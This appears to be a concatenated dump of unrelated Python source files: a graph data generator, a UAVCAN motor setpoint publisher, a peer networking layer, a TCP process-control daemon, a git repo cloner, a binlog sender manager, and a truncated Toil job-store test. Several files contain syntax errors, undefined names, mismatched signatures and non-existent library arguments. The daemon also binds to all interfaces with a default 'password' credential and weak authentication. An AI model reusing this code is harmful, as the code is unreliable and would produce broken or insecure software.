pickle.dump(preprocessed_data, open(self.output_dir + f'data_{file_num:03d}.p', 'wb'), compression='gzip')
file_num += self.num_procs
print(f"Finished processing {file_num} files")
def preprocess_data(self):
print('\nPreprocessing and saving data to {}'.format(self.output_dir))
for i in range(self.num_procs):
p = Process(target=self.preprocessor, args=(i,), daemon=True)
p.start()
self.procs.append(p)
for p in self.procs:
p.join()
self.file_list = [self.output_dir + f'data_{i:03d}.p' for i in range(self.num_files)]
def preprocessed_worker(self, worker_id, batch_queue):
batch_graphs = []
batch_targets = []
batch_meta = []
file_num = worker_id
while file_num < self.num_files:
file_data = pickle.load(open(self.file_list[file_num], 'rb'), compression='gzip')
for i in range(len(file_data)):
batch_graphs.append(file_data[i][0])
batch_targets.append(file_data[i][1])
batch_meta.append(file_data[i][2])
if len(batch_graphs) == self.batch_size:
batch_targets = np.reshape(np.array(batch_targets), [-1,2]).astype(np.float32)
batch_queue.put((batch_graphs, batch_targets, batch_meta))
batch_graphs = []
batch_targets = []
batch_meta = []
file_num += self.num_procs
if len(batch_graphs) > 0:
batch_targets = np.reshape(np.array(batch_targets), [-1,2]).astype(np.float32)
batch_queue.put((batch_graphs, batch_targets, batch_meta))
def worker(self, worker_id, batch_queue):
if self.preprocess:
self.preprocessed_worker(worker_id, batch_queue)
else:
raise Exception('Preprocessing is required for combined classification/regression models.')
def check_procs(self):
for p in self.procs:
if p.is_alive(): return True
return False
def kill_procs(self):
for p in self.procs:
p.kill()
self.procs = []
def generator(self):
# for file in self.file_list:
batch_queue = Queue(2 * self.num_procs)
for i in range(self.num_procs):
p = Process(target=self.worker, args=(i, batch_queue), daemon=True)
p.start()
self.procs.append(p)
while self.check_procs() or not batch_queue.empty():
try:
batch = batch_queue.get(True, 0.0001)
except:
continue
yield batch
for p in self.procs:
p.join()
if __name__ == '__main__':
data_dir = '/usr/workspace/pierfied/preprocessed/data/'
out_dir = '/usr/workspace/pierfied/preprocessed/preprocessed_data/'
pion_files = np.sort(glob.glob(data_dir+'user*.root'))
data_gen = MPGraphDataGenerator(file_list=pion_files,
cellGeo_file=data_dir+'cell_geo.root',
batch_size=32,
shuffle=False,
num_procs=32,
preprocess=True,
output_dir=out_dir)
gen = data_gen.generator()
from tqdm.auto import tqdm
for batch in tqdm(gen):
pass
exit()
|
SetpointPublisher.py
|
import enum
import logging
import time
import threading
import uavcan
class ControlTopic(enum.Enum):
voltage = "voltage"
torque = "torque"
velocity = "velocity"
position = "position"
def __str__(self):
return self.value
def __call__(self, node_id, value):
return {
"voltage": uavcan.thirdparty.cvra.motor.control.Voltage(
node_id=node_id, voltage=value
),
"torque": uavcan.thirdparty.cvra.motor.control.Torque(
node_id=node_id, torque=value
),
"velocity": uavcan.thirdparty.cvra.motor.control.Velocity(
node_id=node_id, velocity=value
),
"position": uavcan.thirdparty.cvra.motor.control.Position(
node_id=node_id, position=value
),
}[self.value]
class SetpointPublisher:
def __init__(self, node, topic, motor, value_min, value_max, period):
self.node = node
self.topic = topic
self.motor = motor
self.value_min = value_min
self.value_max = value_max
self.period = period
self.lock = threading.RLock()
self.handle = node.node.periodic(0.01, self._publish)
self.logger = logging.getLogger("SetpointPublisher")
threading.Thread(target=self._update).start()
def _publish(self):
with self.lock:
logging.info(
"Setpoint: {} {} to motor {} at period {}s".format(
self.topic, self.value, self.motor, self.period
)
)
self.node.node.broadcast(self.topic(node_id=self.motor, value=self.value))
def _update(self):
while True:
with self.lock:
self.value = self.value_min
time.sleep(self.period)
with self.lock:
self.value = self.value_max
time.sleep(self.period)
def update(self):
self.handle.remove()
self.handle = self.node.node.periodic(0.01, self._publish)
|
network_layer.py
|
import time
import threading
from threading import Thread
import datetime
import json
import traceback
import socket
#import networking
import tcp
import udp
import uuid
from connection_state import ConnectionState
def is_published_function(application, function_name):
# does the function exist on this application?
has_function = hasattr(application, function_name)
# is the function published on this application
function_is_published = True
has_published_function_list = hasattr(application, "published_functions")
if has_published_function_list:
function_is_published = function_name in application.published_functions
return has_function and function_is_published
"""
remote_application_manager
--------------------------
used to define what remote interfaces are expected and how they are connected to
expected incoming connections
expected outgoing connections
initializer function for starting up the peer application's process (if not already running)
is_running function for checking if the peer application is running
"""
class peer_application(object):
def __init__(
self,
failed_to_connect_callback=None,
message_received_callback=None,
keep_alive_timeout_callback=None,
new_peer_connected_callback=None,
peer_disconnected_callback=None
):
pass
def start_application(self):
pass
def stop_application(self):
pass
def is_running(self):
pass
# api endpoints provided by a process running on this machine which we (might) have permissions to start/stop.
class peer_local_application(peer_application):
def __init__(
self,
failed_to_connect_callback=None,
message_received_callback=None,
keep_alive_timeout_callback=None,
new_peer_connected_callback=None,
peer_disconnected_callback=None
):
pass
def start_application(self):
pass
def stop_application(self):
pass
def is_running(self):
pass
class peer_remote_application(peer_application):
def __init__(self, **kwargs):
"""
The accepted keyword arguments and their default values are:
"local_application": <object>, The local_application object that will provide functions to the peer application(s).
"application_name": "app1", The expected peer application's name. Must match the name reported by the peer.
"connected_application_min": 1, Minimum number of connected instances of the application before application is considered to be running.
"connected_application_max": 1, Maximum number of instances of the application allowed to connect to us.
"is_host": True, if True, we init connection to the peer. If False, the peer inits connection to us.
"peer_endpoints": [], Expects either None, an empty list, or a list of endpoints from which connections may be made.
'peer_endpoints' is required if is_host=True. If list is empty or None, any peer endpoints may connect.
If is_host, connections will be attempted until 'connected_application_min' is reached.
To specify that any port from a given IP may be used, set the port number to "*" instead of an integer.
[[<ip>, <port>], ...]
"""
keyword_arguments = {
"local_application": None, # Will need a better default than null. An actual local_application object with no public functions.
"application_name": "app1"
"is_host": True, # Is the application we're connecting to the host? If True, we initiate connection to the peer. If False, the peer initiates connection to us.
}
# assign properties from the keyword arguments.
self.apply_keyword_arguments(keyword_arguments, kwargs)
"""
any_peers_allowed = self.peer_endpoints != None and len(self.peer_endpoints) < 1
if any_peers_allowed:
self.peer_endpoints = None
"""
def apply_keyword_arguments(self, default_keyword_arguments, keyword_arguments):
for argument, default_value in default_keyword_arguments.items():
value = default_value
if argument in keyword_arguments.keys():
value = keyword_arguments[argument]
setattr(self, argument, value)
def start_application(self, application_interface = None):
pass
def stop_application(self):
pass
def is_running(self):
return True
class peer_application_manager:
def __init__(self, peer_application_list):
self.peer_application_list = peer_application_list
self.start_managing_applications()
def start_managing_applications(self):
pass
class tcp_client_group:
def __init__(self):
self.client_map = {
# "<ip>_<port>": <TCP_Client object>
}
def send_message(self, message, json_encode=False, prepare=True):
for peer, tcp_client in self.client_map.items():
tcp_client.send_message(message, json_encode, prepare)
# Returns a list of lists: [[addr, timestamp, message], ...]
def pop_all_messages(self, decode_json=False):
messages = []
for peer, tcp_client in self.client_map.items():
messages.extend(tcp_client.pop_all_messages(decode_json))
return messages
class peer_application_interface:
def __init__(self, local_port=59779, peer_endpoints=[]):
self.application_map = {
# <application_name>: application_object
}
self.server_ip = socket.gethostbyname(socket.gethostname())
self.server_port = local_port
self.target_ip = None
self.target_port = None
self.buffer_size = 512
self.server = None #udp.UDP_Client(True, server_ip, server_port, None, None, buffer_size, True, message_received_callback, keep_alive_timeout_callback, new_peer_connected_callback)
self.server_type = "Client"
self.communication_type = "udp"
self.keep_alive = True
self.remote_application_map = {
# "application_name": [[ip, port], [published function list]],
}
self.peer_map = {
# "<ip>_<port>": "application_name"
}
self.unidentified_remote_applications = [
# [<ip>, <port>],
]
self.execution_callback_map = {
#
}
self.built_in_function_list = [
"get_function_list",
"identify",
]
self.message_queue = []
self.check_for_function_return_interval = 0.05
self.remote_application_identification_interval = 0.3
self.message_queue_processing_interval = 0.05
self.connection_state = ConnectionState(False)
self.internal_thread_init()
self.init_server()
# let's init connections to the provided peer endpoints.
self.target_peer_endpoints = []
for peer_endpoint in peer_endpoints:
self.target_peer_endpoints.append(peer_endpoint)
self.initiate_contact_with_peers()
def initiate_contact_with_peers(self):
# simply send the keep-alive message to each peer
for peer_endpoint in self.target_peer_endpoints:
peer_ip, peer_port = peer_endpoint
self.server.send_message("1", False, False, peer_ip, peer_port)
def internal_thread_init(self):
self.connection_state = ConnectionState(True)
Thread(target=self.remote_application_identification).start()
Thread(target=self.message_queue_processor).start()
def identify(self, message_id):
pass
def remote_application_identification(self):
current_connection_state = self.connection_state
while self.connection_state.active:
time.sleep(self.remote_application_identification_interval)
# loop through the peer_map list
for peer, application_name in self.peer_map.items():
target_ip, port = peer.split("_")
port = int(port)
if application_name != None:
continue
# get that peer's list of applications along with published functions on those applications
results = self.execute_remote_function("identify", [], target_ip, target_port, None, message_type="internal_function_call")
def message_queue_processor(self):
current_connection_state = self.connection_state
while self.connection_state.active:
time.sleep(self.message_queue_processing_interval)
while len(message_queue) > 0:
message = message_queue.pop(0)
peer = message[0]
ip, port = peer
timestamp = int(message[1])
data = message[2]
if len(data) < 2:
continue
message_type = data["type"]
if message_type == "function_call":
message_id = data["id"]
function_name = data["function"]
arguments = data["arguments"]
# execute the function if it's published.
self.execute_application_function(peer, message_id, function_name, arguments)
elif message_type == "internal_function_call":
message_id = data["id"]
function_name = data["function"]
arguments = data["arguments"]
if function_name in self.built_in_function_list:
getattr(self, function_name)(peer, message_id, *arguments)
elif message_type == "response":
message_id = data["id"]
results = data["results"]
def shutdown(self):
self.connection_state.active = False;
self.server.disconnect()
def restart(self):
self.server.reconnect()
self.internal_thread_init()
def get_function_list(self, message_id):
response = ""
def receive_function_list(self, message):
pass
def _handle_remote_function_return(self, message_id, message):
pass
def execute_remote_function(self, function_name, *arguments, target_ip, target_port, callback_function=None, message_type="function_call"):
# convert function name and args to a list object
_callback_function = callback_function
if _callback_function == None:
pass
message_id = str(uuid.uuid4())
message = {
"message_type": message_type,
"id": message_id,
"function": function_name,
"arguments": arguments,
}
self.server.send_message(message, True, True, target_ip, target_port)
if callback_function == None:
results = None
# block until either the endpoint responds or disconnects
while True:
time.sleep(self.check_for_function_return_interval)
return results
def _execute_application_function(self, peer, message_id, function_name, application_name, arguments):
target_ip, target_port = peer
if is_published_function(self.application, function_name):
results = getattr(self.application, function_name)(*arguments)
response = {
"message_type": "response",
"id": message_id,
"results": results,
}
self.server.send_message(response, True, True, target_ip, target_port)
else:
# return a server response indicating the function either doesn't exist or isn't published.
error_message = "The function [%s] is not a published function in the application '%s'" % (function_name, application_name)
response = {
"message_type": "error",
"id": message_id,
"function": function_name,
"error": error_message,
}
self.server.send_message(response, True, True, target_ip, target_port)
pass
def execute_application_function(self, peer, message_id, function_name, application_name, arguments):
Thread(target=self._execute_application_function, args=[peer, message_id, function_name, arguments]).start();
def failed_to_connect_callback(self, target_ip, target_port):
pass
def handle_message_received(self):
messages = self.server.pop_all_messages()
for message in messages:
if self.application == None:
continue
self.message_queue.append(message)
def keep_alive_timeout_callback(self, ip, port):
if self.application == None:
return
function_to_call = "keep_alive_timeout"
peer = "%s_%s" % (ip, port)
if is_published_function(self.application, function_to_call):
getattr(self.application, function_to_call)(peer) #(*arguments)
# notify all pending remote function execution response listeners.
handler_queue = self.execution_callback_map[peer]
for handler_pair in handler_queue:
response_handler, disconnect_handler = handler_pair
disconnect_handler(peer)
# remove this peer from the execution callback map
del self.execution_callback_map[peer]
def peer_disconnected_callback(self, ip, port):
pass
def new_peer_connected_callback(self, ip, port):
if self.application == None:
return
function_to_call = "handle_new_peer_connection"
peer = "%s_%s" % (ip, port)
if is_published_function(self.application, function_to_call):
getattr(self.application, function_to_call)(peer) #(*arguments)
# add this peer from the execution callback map
self.execution_callback_map[peer] = []
# add this peer to the peer_map.
self.peer_map[peer] = None
# this function expects an object (module or class instance)
def set_application_object(_application):
"""
Note: You can pass the current module as an object to this function.
import sys
current_module = sys.modules[__name__]
"""
self.application = _application
def set_network_configuration(self, config):
"""
Config must be a dictionary that looks like this:
{
server_ip: <ip>,
server_port: <port>,
target_ip=None,
target_port=None,
buffer_size=512,
communication_type="udp",
server_type="Client"
}
"""
self.server_ip = _server_ip
self.server_port = _server_port
self.target_ip = _target_ip
self.target_port = _target_port
self.buffer_size = _buffer_size
self.communication_type = _communication_type
self.server_type = _server_type.lower().capitalize()
# Keep alive shall be kept required for this remote application interface.
self.keep_alive = True
def set_callbacks(self, _message_received_callback, _keep_alive_timeout_callback, _new_peer_connected_callback):
self.message_received_callback = _message_received_callback
self.keep_alive_timeout_callback = _keep_alive_timeout_callback
self.new_peer_connected_callback = _new_peer_connected_callback
def init_server(self):
if self.communication_type in globals():
communication_module = globals()[self.communication_type]
communication_class_name = "%s_%s" % (self.communication_type.upper(), server_type)
if hasattr(communication_module, communication_class_name):
communication_class = getattr(communication_module, communication_class_name)
self.server = communication_class(
True, # start listening now
self.server_ip,
self.server_port,
self.target_ip,
self.target_port,
self.buffer_size,
self.keep_alive, # send keep-alive packets
self.failed_to_connect_callback,
self.message_received_callback,
self.keep_alive_timeout_callback,
self.new_peer_connected_callback,
self.peer_disconnected_callback
)
|
wrapper.py
|
#!/usr/bin/env python
import subprocess
import sys
import os
import time
import inspect
import json
import socket
import threading
import SocketServer
import traceback
import hashlib
os.chdir('.' or sys.path[0])
global current_dir
folders = sys.argv[0].split(os.sep)
proper_path = os.sep.join(folders[0:-1])
current_dir = os.path.join(os.getcwd(),proper_path)
if current_dir.endswith("."):
current_dir = current_dir[0:-1]
class ProcessControl(object):
def __init__(self,process_exec):
self.proc = None
self.process_exec = process_exec
def start(self):
isonline = self.check()
if isonline=="OFF-LINE":
if self.proc==None:
self.proc = subprocess.Popen(self.process_exec.split(" "))
print("STARTED")
try:
while self.proc.wait():
#return("DONE")
time.sleep(.1)
pass
except Exception,e:
pass
def kill(self):
isonline = self.check()
if isonline=="ON-LINE":
if not self.proc==None:
self.proc.kill()
print("KILLED")
self.proc = None
return("KILLED")
else:
return("NO SERVER")
def check(self):
if self.proc==None:
return("OFF-LINE")
else:
return("ON-LINE")
return("None")
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
conf = config(os.path.join(current_dir,"config"))
for data in conf["processes"]:
self.server.child_process[data]["password"] = conf["processes"][data]["password"]
data = self.request.recv(1024)
protodata = data.split(",")
proc = protodata[0]
user = protodata[1]
hpass = protodata[2]
action = protodata[3]
password = hash(self.server.child_process[proc]["password"]+str(time.time())[0:9]+action)
if user == conf["username"] and hpass == password:
if action=="start":
response = "OK"
self.request.sendall(response)
self.server.child_process[proc]["process"].start()
if action=="stop":
response = self.server.child_process[proc]["process"].kill()
self.request.sendall(response)
if action=="restart":
self.server.child_process[proc]["process"].kill()
response = "OK"
self.request.sendall(response)
self.server.child_process[proc]["process"].start()
if action=="check":
response = self.server.child_process[proc]["process"].check()
self.request.sendall(response)
else:
print("bad user/pass")
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
def __init__(self, child_process, *args, **kwargs):
self.child_process = child_process
SocketServer.TCPServer.__init__(self, *args, **kwargs)
def config_init(configlocation):
if not os.path.exists(configlocation):
open(configlocation, 'w').write(inspect.cleandoc(
r'''{
"processes": {
"1": {
"process": "/command/to/exe",
"password": "password"
}
},
"username": "user",
"port": 16260
}''') + '\n')
def config(configlocation):
try:
con = json.load(open(configlocation))
return(con)
except ValueError, e:
print 'ERROR: malformed config!', e
def hash(input):
return(hashlib.sha256(input).hexdigest())
def main():
i = 0
proc = None
server = None
conflocation = os.path.join(current_dir,"config")
config_init(conflocation)
global conf
conf = config(conflocation)
child_process = {}
for data in conf["processes"]:
child_process[data] = {}
child_process[data]["process"] = ProcessControl(conf["processes"][data]["process"])
child_process[data]["password"] = conf["processes"][data]["password"]
try:
while True:
if i==0:
SocketServer.ThreadingTCPServer.allow_reuse_address = True
server = ThreadedTCPServer(child_process, ("0.0.0.0", conf["port"]), ThreadedTCPRequestHandler)
ip, port = server.server_address
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
print("Started the process daemon.")
i=+1
time.sleep(.1)
except Exception,e:
type_, value_, traceback_ = sys.exc_info()
ex = traceback.format_exception(type_, value_, traceback_)
trace = ""
for data in ex:
trace = str(trace+data)
if not proc==None:
proc.kill()
if not server==None:
server.shutdown()
print("SHUTDOWN")
else:
print("Failed to start.\n"+str(trace))
main()
#TODO:
#config file
#multiplexing
|
remise.py
|
#!/usr/bin/python3
import json;
import subprocess;
# import dummy_threading as threading;
import threading;
import argparse;
parser = argparse.ArgumentParser(description="git repo fetcher");
parser.add_argument("--destination", help='base dir destination');
parser.add_argument("--branch", help="branch to be checked out");
args = parser.parse_args();
BASE_DIR = "build";
BRANCH = "remise_4";
if args.destination is not None:
BASE_DIR = args.destination;
if args.branch is not None:
BRANCH = args.branch;
LOG_DIR = "log";
with open('mapping.json') as fd:
mapping = json.loads(fd.read());
def writeBranch(destinationDir):
logFile = open(destinationDir + "/BRANCH.txt", 'w');
subprocess.run(["git", "-C", destinationDir, "rev-parse", "--abbrev-ref", "HEAD"], stdout=logFile, stderr=logFile);
def clone(repoUrl, destinationDir, logFilePath):
logFile = open(logFilePath, "w");
try:
subprocess.run(["git","clone",repoUrl,destinationDir], stdout=logFile, stderr=logFile);
subprocess.run(["git", "-C", destinationDir, "checkout", "--track", "origin/{}".format(BRANCH)], stdout=logFile, stderr=logFile);
writeBranch(destinationDir);
except:
pass
print("Done cloning {}".format(repoUrl));
threads = [];
for cours, repos in mapping.items():
subprocess.run(["mkdir", "-p", BASE_DIR + "/" + LOG_DIR + "/" + cours]);
for repo in repos['repos']:
cloneDir = BASE_DIR + "/" + cours + "/" + repo['equipe'];
logFilePath = BASE_DIR + "/" + LOG_DIR + "/" + cours + "/" + repo['equipe'] + ".txt";
thread = threading.Thread(target=clone, args=(repo['url'], cloneDir, logFilePath));
threads.append(thread);
for thread in threads:
thread.start();
for thread in threads:
thread.join();
|
binlogSenderManager.py
|
# Copyright (c) 2020-present ly.com, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/python
#-*- coding:utf8 -*-
import sys
import os
import threading
import Queue
from mysqlSender import MysqlSender
from fileSender import fileSender
from kafkaSender import KafkaSender
class BinlogSenderManager(threading.Thread):
def __init__(self,config, Queue, ackFunc):
self.sendTypeList = list(set(config.get('type').split(','))
self.senderList = []
self.ackCallBack = ackFunc
self.onceSendCount = 100
self.ackIDUpdateLock = threading.Lock()
self.ackIDCountDict = {}
for sendType in self.sendTypeList:
if sendType == 'kafka':
sender = KafkaSender(config)
self.senderList.append(sender)
elif sendType == 'mysql':
sender = MysqlSender(config)
self.senderList.append(sender)
elif sendType == 'file':
sender = FileSender(config)
self.senderList.append(sender)
else:
continue
if len(self.senderList) == 0:
raise Exception("no sender init")
def onSenderAck(self, ackTsList):
self.ackIDUpdateLock.acquire()
maxAckID = 0
for ackTs in ackTsList:
if ackTs not in self.ackIDCountDict:
continue
self.ackIDCountDict[ackTs] += 1
for key, count in self.ackIDCountDict.items():
if count >= len(self.senderList):
maxAckID = key
else:
break
if maxAckID > 0:
self.ackCallBack(maxAckID)
self.ackIDUpdateLock.release()
def init(self):
for sender in self.senderList:
if not sender.init():
return False
self.ackThread = threading.Thread(target = self.ackThreadFunc)
self.ackThread.setDaemon(True)
return True
def start(self):
self.ackThread.start()
for sender in self.senderList:
sender.start():
senderCount = len(self.senderList)
while not self._stop:
for i in range(0,1000):
blog = self.queue.get()
binlogList.append(blog)
self.ackCount.append(0)
if maxID < blog['commitTs']:
maxID = blog['commitTs']
self.ackIDCountDict[blog['commitTs']] = 0
if self.queue.empty():
break
for sender in self.senderList:
sender.send(binlogList)
|
jobStoreTest.py
|
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import range
from builtins import str
from past.utils import old_div
from builtins import object
import socketserver
import pytest
import hashlib
import logging
import threading
import os
import sys
import shutil
import tempfile
import time
import uuid
from stubserver import FTPStubServer
from abc import abstractmethod, ABCMeta
from itertools import chain, islice
from threading import Thread
from six.moves.queue import Queue
from six.moves import SimpleHTTPServer, StringIO
from six import iteritems
import six.moves.urllib.parse as urlparse
from six.moves.urllib.request import urlopen, Request
from toil.lib.memoize import memoize
from toil.lib.exceptions import panic
# noinspection PyPackageRequirements
# (installed by `make prepare`)
from toil.lib.compatibility import USING_PYTHON2
from toil.common import Config, Toil
from toil.fileStores import FileID
from toil.job import Job, JobNode
from toil.jobStores.abstractJobStore import (NoSuchJobException,
NoSuchFileException)
from toil.jobStores.fileJobStore import FileJobStore
from toil.statsAndLogging import StatsAndLogging
from toil.test import (ToilTest,
needs_aws_s3,
needs_encryption,
make_tests,
needs_google,
travis_test,
slow)
from future.utils import with_metaclass
# Need googleRetry decorator even if google is not available, so make one up.
# Unconventional use of decorator to determine if google is enabled by seeing if
# it returns the parameter passed in.
if needs_google(needs_google) is needs_google:
from toil.jobStores.googleJobStore import googleRetry
else:
def googleRetry(x):
return x
logger = logging.getLogger(__name__)
def tearDownModule():
AbstractJobStoreTest.Test.cleanUpExternalStores()
class AbstractJobStoreTest(object):
"""
Hide abstract base class from unittest's test case loader
http://stackoverflow.com/questions/1323455/python-unit-test-with-base-and-sub-class#answer-25695512
"""
class Test(with_metaclass(ABCMeta, ToilTest)):
@classmethod
def setUpClass(cls):
super(AbstractJobStoreTest.Test, cls).setUpClass()
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('boto').setLevel(logging.CRITICAL)
# The use of @memoize ensures that we only have one instance of per class even with the
# generative import/export tests attempts to instantiate more. This in turn enables us to
# share the external stores (buckets, blob store containers, local directory, etc.) used
# for testing import export. While the constructor arguments are included in the
# memoization key, I have only ever seen one case: ('test', ). The worst that can happen
# if other values are also used is that there will be more external stores and less sharing
# of them. They will still all be cleaned-up.
@classmethod
@memoize
def __new__(cls, *args):
return super(AbstractJobStoreTest.Test, cls).__new__(cls)
def _createConfig(self):
return Config()
@abstractmethod
def _createJobStore(self):
"""
:rtype: AbstractJobStore
"""
raise NotImplementedError()
def setUp(self):
super(AbstractJobStoreTest.Test, self).setUp()
self.namePrefix = 'jobstore-test-' + str(uuid.uuid4())
self.config = self._createConfig()
# Jobstores to be used in testing.
# jobstore_initialized is created with a particular configuration, as creating by self._createConfig()
# jobstore_resume_noconfig is created with the resume() method. resume() will look for a previously
# instantiated jobstore, and initialize the jobstore calling it with the found config. In this case,
# jobstore_resume_noconfig will be initialized with the config from jobstore_initialized.
self.jobstore_initialized = self._createJobStore()
self.jobstore_initialized.initialize(self.config)
self.jobstore_resumed_noconfig = self._createJobStore()
self.jobstore_resumed_noconfig.resume()
# Requirements for jobs to be created.
self.arbitraryRequirements = {'memory': 1, 'disk': 2, 'cores': 1, 'preemptable': False}
self.arbitraryJob = JobNode(command='command',
jobStoreID=None,
jobName='arbitrary', unitName=None,
requirements=self.arbitraryRequirements)
self.parentJobReqs = dict(memory=12, cores=34, disk=35, preemptable=True)
self.childJobReqs1 = dict(memory=23, cores=45, disk=46, preemptable=True)
self.childJobReqs2 = dict(memory=34, cores=56, disk=57, preemptable=False)
def tearDown(self):
self.jobstore_initialized.destroy()
self.jobstore_resumed_noconfig.destroy()
super(AbstractJobStoreTest.Test, self).tearDown()
@travis_test
def testInitialState(self):
"""Ensure proper handling of nonexistant files."""
self.assertFalse(self.jobstore_initialized.exists('nonexistantFile'))
self.assertRaises(NoSuchJobException, self.jobstore_initialized.load, 'nonexistantFile')
@travis_test
def testJobCreation(self):
"""
Test creation of a job.
Does the job exist in the jobstore it is supposed to be in?
Are its attributes what is expected?
"""
jobstore = self.jobstore_initialized
# Create a job and verify its existence/properties
aJobNode = JobNode(command='parent1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onParent',
jobStoreID=None, predecessorNumber=0)
job = jobstore.create(aJobNode)
self.assertTrue(jobstore.exists(job.jobStoreID))
self.assertEqual(job.command, 'parent1')
self.assertEqual(job.memory, self.parentJobReqs['memory'])
self.assertEqual(job.cores, self.parentJobReqs['cores'])
self.assertEqual(job.disk, self.parentJobReqs['disk'])
self.assertEqual(job.preemptable, self.parentJobReqs['preemptable'])
self.assertEqual(job.jobName, 'test1')
self.assertEqual(job.unitName, 'onParent')
self.assertEqual(job.stack, [])
self.assertEqual(job.predecessorNumber, 0)
self.assertEqual(job.predecessorsFinished, set())
self.assertEqual(job.logJobStoreFileID, None)
@travis_test
def testConfigEquality(self):
"""
Ensure that the command line configurations are successfully loaded and stored.
In setUp() self.jobstore1 is created and initialized. In this test, after creating newJobStore,
.resume() will look for a previously instantiated job store and load its config options. This is expected
to be equal but not the same object.
"""
newJobStore = self._createJobStore()
newJobStore.resume()
self.assertEqual(newJobStore.config, self.config)
self.assertIsNot(newJobStore.config, self.config)
@travis_test
def testJobLoadEquality(self):
"""Tests that a job loaded into one jobstore from another can be used equivalently by another."""
# Create a job on the first jobstore.
jobNode1 = JobNode(command='jobstore1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJS1',
jobStoreID=None, predecessorNumber=0)
job1 = self.jobstore_initialized.create(jobNode1)
# Load it onto the second jobstore
job2 = self.jobstore_resumed_noconfig.load(job1.jobStoreID)
self.assertEqual(job1, job2)
@travis_test
def testChildLoadingEquality(self):
"""Test that loading a child job operates as expected."""
aJobNode = JobNode(command='parent1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onParent',
jobStoreID=None, predecessorNumber=0)
jobNodeOnChild = JobNode(command='child1',
requirements=self.childJobReqs1,
jobName='test2', unitName='onChild1',
jobStoreID=None)
job = self.jobstore_initialized.create(aJobNode)
childJob = self.jobstore_initialized.create(jobNodeOnChild)
job.stack.append(childJob)
self.jobstore_initialized.update(job)
self.assertEqual(self.jobstore_initialized.load(childJob.jobStoreID), childJob)
@travis_test
def testPersistantFilesToDelete(self):
"""
Make sure that updating a job carries over filesToDelete.
The following demonstrates the job update pattern, where files to be deleted are referenced in
"filesToDelete" array, which is persisted to disk first. If things go wrong during the update, this list of
files to delete is used to remove the unneeded files.
"""
# Create a job.
jobNode = JobNode(command='job1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJS1',
jobStoreID=None, predecessorNumber=0)
job = self.jobstore_initialized.create(jobNode)
job.filesToDelete = ['1', '2']
self.jobstore_initialized.update(job)
self.assertEqual(self.jobstore_initialized.load(job.jobStoreID).filesToDelete, ['1', '2'])
@travis_test
def testUpdateBehavior(self):
"""Tests the proper behavior during updating jobs."""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
aJobNode = JobNode(command='parent1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onParent',
jobStoreID=None, predecessorNumber=0)
jobNodeOnChild1 = JobNode(command='child1',
requirements=self.childJobReqs1,
jobName='test2', unitName='onChild1',
jobStoreID=None)
jobNodeOnChild2 = JobNode(command='child2',
requirements=self.childJobReqs2,
jobName='test3', unitName='onChild2',
jobStoreID=None)
job1 = jobstore1.create(aJobNode)
job2 = jobstore2.load(job1.jobStoreID)
# Create child jobs.
childJob1 = jobstore2.create(jobNodeOnChild1)
childJob2 = jobstore2.create(jobNodeOnChild2)
# Add them to job2.
job2.stack.append((childJob1, childJob2))
jobstore2.update(job2)
# Check equivalence between jobstore1 and jobstore2.
# While job1 and job2 share a jobStoreID, job1 has not been "refreshed" to show the newly added child jobs.
self.assertNotEqual(job2, job1)
# Reload parent job on jobstore, "refreshing" the job.
job1 = jobstore1.load(job1.jobStoreID)
self.assertEqual(job2, job1)
# Load children on jobstore and check equivalence
self.assertEqual(jobstore1.load(childJob1.jobStoreID), childJob1)
self.assertEqual(jobstore1.load(childJob2.jobStoreID), childJob2)
self.assertEqual(job1, job2) # The jobs should both have children now...
self.assertIsNot(job1, job2) # but should not be the same.
@travis_test
def testChangingJobStoreID(self):
"""
Tests that changing the jobStoreID makes jobs unequivalent.
Create two job trees, jobstore1 & jobstore2 consisting of a parent and 5 child jobs. The children of
jobstore2 will be copied from jobstore1. Changing the jobstoreFileID on each child on jobstore1 will cause
them to be different jobs. After updating the children of jobstore2, they should be equal.
"""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
# Create a job
aJobNode = JobNode(command='parent1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onParent',
jobStoreID=None, predecessorNumber=0)
# Load the job onto the two jobstores.
parentJob1 = jobstore1.create(aJobNode)
parentJob2 = jobstore2.load(parentJob1.jobStoreID)
# Create an array of child jobs for each jobstore.
for i in range(0, 5):
jobNodeOnChild1 = JobNode(command='child' + str(i),
requirements=self.childJobReqs1,
jobName='test' + str(i), unitName='onChild1',
jobStoreID=None)
aChildJob = jobstore1.create(jobNodeOnChild1)
parentJob1.stack.append(aChildJob)
jobstore2.load(aChildJob.jobStoreID)
# Compare children before and after update.
for childJob in parentJob2.stack:
self.assertEqual(childJob, jobstore1.load(childJob.jobStoreID))
childJob.logJobStoreFileID = str(uuid.uuid4())
childJob.remainingRetryCount = 66
self.assertNotEqual(childJob, jobstore1.load(childJob.jobStoreID))
# Update the children on the second jobstore.
for childJob in parentJob2.stack:
jobstore2.update(childJob)
# Check that the jobs are equivalent after being reloaded.
for childJob in parentJob2.stack:
